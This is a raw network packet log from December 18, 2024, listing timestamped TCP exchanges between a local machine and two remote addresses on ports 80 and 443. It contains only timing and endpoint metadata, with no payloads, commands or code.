                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.784894943 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.785696030 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.785784006 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.785829067 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.786575079 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.786624908 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.786642075 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.787355900 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.787409067 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.787491083 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.788484097 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.788522005 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.788865089 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.789149046 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.789189100 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.789474010 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.790294886 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.790344000 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.790391922 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.803827047 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.803916931 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.803945065 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.804105043 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.804153919 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.804223061 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.804944038 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.805053949 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.805087090 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.805826902 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.805867910 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.805975914 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.806458950 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.806502104 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.806567907 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.807373047 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.807424068 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.807516098 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.808254957 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.808404922 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.808414936 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.809150934 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.809201956 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.809263945 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.810046911 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.810095072 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.810157061 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.810965061 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.811028004 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.811084032 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.811825991 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.811875105 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.811942101 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.812743902 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.812819958 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.812851906 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.813621044 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.813688993 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.813755989 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.814543962 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.814594030 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.814647913 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.815464020 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.815510988 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.815793991 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.816338062 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.816426039 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.816473007 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.817198992 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.817245007 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.817312956 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.818190098 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.818265915 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.818281889 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.818969965 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.819021940 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.819113970 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.820039034 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.820089102 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.820117950 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.820760012 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.820883989 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.820929050 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.821666956 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.821712971 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.821821928 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.822551012 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.822593927 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.822681904 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.823434114 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.823489904 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.823563099 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.824335098 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.824373960 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.824527025 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.825221062 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.825324059 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.825378895 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.826271057 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.826323032 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.826380014 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.827048063 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.827152967 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.827198029 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.827949047 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.828197002 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.828228951 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.828985929 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.829037905 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.829071999 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.829773903 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.829905987 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.829951048 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.830691099 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.830738068 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.830944061 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.831625938 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.831667900 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.831701040 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.832372904 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.832422972 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.832567930 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.833312988 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.833370924 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.833393097 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.834256887 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.834307909 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.834331989 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.835036993 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.835082054 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.835217953 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.835946083 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.836116076 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.836225986 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.836896896 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.836941004 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.837048054 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.837794065 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.837913036 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.837929010 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.838629961 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.838671923 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.838788986 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.839523077 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.839561939 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.839634895 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.840533018 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.840636969 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.840657949 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.841474056 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.841556072 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.841614962 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.919814110 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.934398890 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.934461117 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.934473038 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.934524059 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.964267015 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.964335918 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.964351892 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.964413881 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.974641085 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.974661112 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.974740028 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.974873066 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.975120068 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.975498915 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.975786924 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.975930929 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.975986004 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.976706982 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.976840973 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.976885080 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.977603912 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.977762938 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.978061914 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.978502035 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.978665113 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.978717089 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.979363918 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.979645014 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.980309963 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.980364084 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.980437040 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.980482101 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.981158972 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.981275082 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.982054949 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.982115030 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.982191086 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.982232094 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.986388922 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.986474037 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.986494064 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.986985922 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.995239019 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.995807886 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.995903969 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.995943069 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.995987892 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.996201992 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.996429920 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.996896029 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.996949911 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.997036934 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.997081041 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.997852087 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.997982025 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.998704910 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.998750925 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.998862028 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.998905897 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.999584913 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.999763012 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.000477076 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.000523090 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.000617981 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.000662088 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.001630068 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.001641989 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.001676083 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.002284050 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.002413034 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.002455950 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.003381014 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.003499031 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.004080057 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.004133940 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.004204035 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.004245996 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.004955053 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.005153894 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.005883932 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.005939007 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.005995989 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.006252050 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.006731033 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.006892920 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.006948948 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.007651091 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.007782936 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.008537054 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.008605003 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.008692980 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.008744955 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.009330034 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.009414911 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.009423971 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.009464025 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.009521008 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.009720087 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.010067940 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.010329008 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.010456085 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.010637999 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.011250019 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.011559010 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.011945009 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.012129068 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.012278080 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.013081074 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.013137102 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.013164997 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.013202906 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.013930082 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.014050961 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.014519930 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.014812946 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.014966965 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.015680075 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.015710115 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.015908003 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.015952110 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.016587019 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.016880035 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.017482996 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.017530918 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.017640114 CET8049802139.99.188.124192.168.2.6
